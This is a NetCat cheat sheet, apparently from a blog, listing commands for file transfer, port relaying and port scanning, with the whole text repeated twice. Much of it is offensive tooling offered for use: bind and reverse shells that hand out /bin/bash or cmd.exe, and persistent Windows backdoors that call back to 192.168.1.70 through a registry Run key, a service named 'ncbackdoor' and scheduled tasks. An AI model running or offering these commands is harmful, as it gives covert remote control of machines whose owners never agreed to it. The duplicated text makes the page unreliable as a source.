NetCat is known as the TCP/IP Swiss-army knife. It allows one to write data across a TCP or UDP connection. It is available for most Unix/Linux operating systems as well as Windows.
Here are some fun things you can do with NetCat:
Execute shell on client connection:
nc –l –p 12345 –e /bin/bash (Unix/Linux)
nc –l –p 12345 –e cmd.exe (Windows)
nc –l –p 12345 –e cmd.exe -L - reopens connection after client closes connections (windows only)
Reverse shell:
nc -l -p 12345
nc <server ip> 12345 -e /bin/bash
Zero i/o mode(port scanning) (-z):
nc -z -v 192.168.1.1 1-65535
Redirect received info to file:
nc –l –p 12345 > dumpfile
Redirect input to file. When client connects, it will receive file:
nc –l –p 12345 < dumpfile
Client connects to server. dumpfile is transfer from server and outputted to client.
nc 192.168.1.1 12345 > dumpfile
Redirect ports and traffic (Relay):
nc –l –p 12345 | nc <hostname of target> 54321
Client connects to server on port 12345 but the target sees traffic coming from the server on
port 54321.
Configure backdoor to run everytime windows user logs in (domain priviledges):
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
“c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe”
Executing backdoor using a windows service(only local system shell):
sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
net start ncbackdoor
Executing backdoor using windows task scheduler (only local system shell):
C:\>at 15:00:00 /every:m,t,w,th,f,s,su ““c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe””
Unzip/un-tar file over network:
source:
dd if=some.file.tar.gz | nc <destination ip> 12345 -vvv
destination (tar must be run with the "-"):
nc -l -p 12345 -vv | tar xzf -
Here are some fun things you can do with NetCat:
Execute shell on client connection:
nc –l –p 12345 –e /bin/bash (Unix/Linux)
nc –l –p 12345 –e cmd.exe (Windows)
nc –l –p 12345 –e cmd.exe -L - reopens connection after client closes connections (windows only)
Reverse shell:
nc -l -p 12345
nc <server ip> 12345 -e /bin/bash
Zero i/o mode(port scanning) (-z):
nc -z -v 192.168.1.1 1-65535
Redirect received info to file:
nc –l –p 12345 > dumpfile
Redirect input to file. When client connects, it will receive file:
nc –l –p 12345 < dumpfile
Client connects to server. dumpfile is transfer from server and outputted to client.
nc 192.168.1.1 12345 > dumpfile
Redirect ports and traffic (Relay):
nc –l –p 12345 | nc <hostname of target> 54321
Client connects to server on port 12345 but the target sees traffic coming from the server on
port 54321.
Configure backdoor to run everytime windows user logs in (domain priviledges):
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
“c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe”
Executing backdoor using a windows service(only local system shell):
sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
net start ncbackdoor
Executing backdoor using windows task scheduler (only local system shell):
C:\>at 15:00:00 /every:m,t,w,th,f,s,su ““c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe””
Unzip/un-tar file over network:
source:
dd if=some.file.tar.gz | nc <destination ip> 12345 -vvv
destination (tar must be run with the "-"):
nc -l -p 12345 -vv | tar xzf -